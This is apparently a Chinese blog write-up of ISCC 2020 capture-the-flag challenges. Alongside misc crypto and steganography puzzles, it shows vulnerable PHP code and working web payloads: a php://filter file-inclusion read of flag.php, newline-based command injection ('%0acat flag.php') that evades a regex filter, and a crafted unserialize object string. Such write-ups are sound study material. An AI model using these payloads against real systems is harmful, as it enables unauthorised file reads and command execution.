ISCC2020部分wp

ISCC签到

在这里插入图片描述
下载附件，拖进winhex，修改图片高度

提交ISCC{D3tivtm_ zv_ Tq5I_Dygef}，结果错误。应该进行了加密，尝试了栅栏密码和凯撒密码也不对，最后才知道是维吉尼亚加密。题目中的high应该就是key。

flag:ISCC{W3lcome_ to_ Mi5C_ Wryyy}

阿森的爱情-1

Where is file?-1

考察php伪协议

<?php
show_source(__FILE__);
echo $_GET['hello'];
$file=$_GET['file'];
while (strstr($file, "file://")) {
    $file=str_replace("file://", "", $file);
}
include($file);
?>

从给出的代码来看，参数名是file，并且过滤了file协议。使用伪协议(根据源码，不能使用file协议)读取flag内容：

Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php

可以得到一串求字符串：
PD9waHAKJGE9ImZsYWd7d2ViX2luY2x1ZGVfZmlsZX0iOwo/Pgo=

Base64解密可得到：

<?php
$a="flag{web_include_file}";
?>

阿帅的爱情

<?php
if(!isset($_GET["ip"])){
    show_source(__file__);
} else
{
    $ip=$_GET["ip"];
    $pattern="/[;|&].*[a-zA-Z]+/";
    if(preg_match($pattern,$ip)!=0){
        die('bad domain');
    }
    try {
        $result = shell_exec('ping -c 4 ' . $ip);
    }
    catch(Exception $e) {
        $result = $e->getMessage();
        echo $result;
    }
    $result = str_replace("\n", "<br>", $result);
    echo $result;
}

?ip=%0als

在这里插入图片描述
http://101.201.126.95:7013/?ip=%0acat%20flag.php

?ip=%0acat flag.php

在这里插入图片描述

Php is the best language

在这里插入图片描述
打开下载的文件

<?php  
@error_reporting(1);
include 'flag.php';
class baby 
{
    public $file;
    function __toString()      
    {
        if(isset($this->file))
        {
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename)))
            {
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}


if (isset($_GET['data']))
{
    $data = $_GET['data'];
        $good = unserialize($data);
        echo $good;
}
else 
{
    $url='./index.php';
}

$html='';
if(isset($_POST['test'])){
    $s = $_POST['test'];
    $html.="<p>谢谢参与!</p>";
}
?>

修改代码

<?php  
@error_reporting(1);
include 'flag.php';
class baby 
{
    public $file="flag.php";
    function __toString()      
    {
        if(isset($this->file))
        {
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename)))
            {
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}

$a = new baby;
echo serialize($a);
?>

运行上面的代码，可得到：

O:4:"baby":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述
这串字符串应该是Base64加密

ISCC成绩查询-1

在这里插入图片描述
下载得到一个PNG文件，使用Stegsolve，发现隐写以下内容

在这里插入图片描述
基本确定是一个哥尼斯堡七桥问题，观察到上图只有14、5号点是奇度数节点，所以是存在欧拉通路的半欧拉图。从两个奇度数点出发，找到符合图片顺序的欧拉通路。

连接后为：TRLNCHHAFCIEEIEEPR

flag{THERAILFENCECIPHER}

posted @ 2020-07-10 15:38 atkx 阅读(165) 评论(0) 编辑收藏举报

刷新页面返回顶部

Atkx's blog